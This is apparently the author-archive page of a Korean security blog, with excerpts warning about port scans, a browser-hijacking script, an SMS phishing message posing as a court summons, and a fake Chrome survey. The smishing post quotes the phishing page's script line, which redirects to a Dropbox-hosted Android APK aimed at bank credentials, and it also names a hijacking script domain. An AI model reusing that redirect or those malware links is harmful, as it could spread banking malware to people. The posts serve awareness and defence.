Author Archives: security

IP 추적 Attackers

https://talosintelligence.com/ Web & Email Reputation Support Adjustments If you own or have come across a domain, URL, or IP that you believe has the incorrect reputation, please submit a reputation adjustment ticket. You must be logged into your account in order to submit a ticket. If you do not have a CCO ID through Cisco,… Read More »

컴 세팅 후 해커들 난리

  방화벽 ufw 으로 특정아이피만 허용한 상태에서 로그 확인 하면 특정포트가 열려 있는지 확인 하기 위하여 아이피를 돌아가면 접속 시도 로그아이피 하나를 조회하면 아이피 출발지가 루마니아로 나옴 내부 방화벽 설정이 중요하다는 반증

Browser hijacking

Browser hijacking 포탈 인기검색어로 들어가 특정 사이트 링크를 타고 들어 가능 경우 그 사이트에 Browser hijacking 가 숨겨져 있는 경우가 있다.     사이트 소스 보기를 하면 _minisrclink.cool/1e40c8bd4601a5a5a4.js 이 있다.   제거가 번거럽다. 참조 : https://malwarecomplaints.info/remove-minisrclink-cool-virus/

스마트폰 피싱 문자=> KB 은행 앱 해킹용

[법원] 민사소송 출석명령서입니다. 라고 문자 날라와서. 크롬으로 사이트 들어가 보니 <script>location.replace(‘https://www.dropbox.com/s/ev44e5vwd8joyac/16yk.apk?dl=1’);</script> 16yk.apk 파일 다운로드 되네요. 아이폰에는 안갈리겠고  안드로이드용 입니다. 털림 1.특정 SMS 계정 털림 (국내) 2. url.kr 사이트 ftp 털림 (국내) 3. dropbox.com ftp 털림 (해외 :미국) 소스 확인해보니 k b _ c a r d _ l a y o u t  택스트 보이는 거… Read More »

[피싱 주의] 크롬 브라우저 온라인 설문 조사

구글에서 하는줄 알았네   알고 보니 피싱 사이트 구글 많이 써서 나한테 보상 하는구나 생각하고 1달러  Samsung Galaxy 카드 결제 했다간 낭패봄  나도 당할뻔 했네. => 세상에 공짜는 없다.   사이트 추적 하니 러시아네요. 이런것도 있네요. 완전 속겠다. 구글에서 공짜로 왜죠!!!